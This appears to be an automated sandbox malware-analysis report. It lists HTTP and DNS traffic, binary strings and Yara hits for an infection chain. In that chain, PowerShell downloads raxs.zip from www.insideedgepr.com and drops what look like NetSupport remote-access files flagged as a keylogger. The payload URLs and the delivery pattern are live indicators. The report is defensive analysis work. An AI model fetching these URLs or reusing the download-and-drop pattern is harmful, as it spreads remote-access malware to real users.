Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jgdtline.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/fybg.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/10/cropped-favicon-32x32.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/logo1.svg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E6%B1%BD%E8%BD%A6%E5%BA%94%E7%94%A8.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/09/%E7%A7%91%E5%AD%A6%E7%A0%94%E7%A9%B6.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/08/01%E5%8E%9F%E6%9D%90%E6%96%99.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/08/03%E6%BF%80%E5%85%89%E5%85%89%E5%AD%A6%E5%85%83%E5%99%A8%E4%BB%B6.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E6%B6%88%E8%B4%B9%E7%94%B5%E5%AD%90.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/dtimg.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/09/Optical-coating-3.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E5%85%88%E8%BF%9B%E5%88%B6%E9%80%A0.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E5%8C%BB%E7%96%97%E5%81%A5%E5%BA%B7.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/07/04%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/footbg.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E5%85%89%E9%80%9A%E4%BF%A1.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jjbg.jpg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: u=1, i
Source: global traffic HTTP traffic detected: GET /raxs.zip?8d21e5f647d81a33c781 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.insideedgepr.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3AbPdawTdpo235d&MD=4WrkVZ6r HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.focuslight.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: www.focuslight.com
Source: global traffic DNS traffic detected: DNS query: ace-project.org
Source: global traffic DNS traffic detected: DNS query: meimei68.top
Source: global traffic DNS traffic detected: DNS query: focuslight-www.oss-ap-southeast-1.aliyuncs.com
Source: global traffic DNS traffic detected: DNS query: sc.lfeeder.com
Source: global traffic DNS traffic detected: DNS query: tr.lfeeder.com
Source: global traffic DNS traffic detected: DNS query: www.insideedgepr.com
Source: unknown HTTP traffic detected: POST /header.php HTTP/1.1Host: www.insideedgepr.comUser-Agent: curl/7.83.1Accept: */*
Source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr String found in binary or memory: http://%s/fakeurl.htm
Source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr String found in binary or memory: http://%s/testpage.htm
Source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://127.0.0.1
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: hw.dll.28.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hw.dll.28.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: hw.dll.28.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: hw.dll.28.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: hw.dll.28.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: hw.dll.28.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hw.dll.28.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: hw.dll.28.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: hw.dll.28.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: hw.dll.28.dr String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 0000001C.00000002.1759185059.0000000004C01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: hw.dll.28.dr String found in binary or memory: http://support.steampowered.com
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://sv.symcd.com0&
Source: hw.dll.28.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: hw.dll.28.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: hw.dll.28.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: hw.dll.28.dr String found in binary or memory: http://www.counter-strike.net/cheat.html
Source: client32.exe, 0000001D.00000002.2021916267.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891661737.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973680770.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: client32.exe, 0000001D.00000002.2021916267.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891661737.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973680770.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: client32.exe, 0000001D.00000002.2021916267.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891661737.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973680770.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://www.pci.co.uk/support
Source: client32.exe, 0000001D.00000002.2021916267.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891661737.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973680770.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://www.symauth.com/cps0(
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: http://www.symauth.com/rpa00
Source: powershell.exe, 0000001C.00000002.1759185059.0000000004C01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.28.dr, HTCTL32.DLL.28.dr, PCICL32.DLL.28.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: hw.dll.28.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, client32.exe.28.dr, remcmdstub.exe.28.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: curl.exe, 00000018.00000002.1578523961.0000000002A70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000003.1577847612.0000000002985000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000002.1578218088.0000000002958000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000003.1577752347.0000000002985000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/header.php
Source: curl.exe, 00000018.00000002.1578218088.0000000002950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/header.php-oC:
Source: curl.exe, 00000018.00000002.1578327815.0000000002985000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000003.1577847612.0000000002985000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000003.1577752347.0000000002985000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/header.phpUZ
Source: curl.exe, 00000018.00000002.1578218088.0000000002958000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/header.phpf
Source: curl.exe, 00000018.00000002.1578218088.0000000002958000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/header.phpj
Source: client32.exe, 0000001D.00000002.2019433099.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000001D.00000002.2019290970.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000001D.00000002.2017612312.0000000000905000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001E.00000002.1764196566.0000000003240000.00000004.00000020.00020000.00000000.sdmp, xss.bat.24.dr String found in binary or memory: https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781
Source: powershell.exe, 0000001C.00000002.1757624677.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c7811/
Source: reg.exe, 0000001E.00000002.1764196566.0000000003240000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781LOCALAPPDATA=C:
Source: client32.exe, 0000001D.00000002.2017612312.00000000008BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781Y
Source: client32.exe, 0000001D.00000002.2019290970.0000000000E80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781s=
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49761 version: TLS 1.2
Yara detected Keylogger Generic
Source: Yara match File source: 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: client32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 3244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\PCICL32.DLL, type: DROPPED

System Summary
barindex
Powershell drops PE file
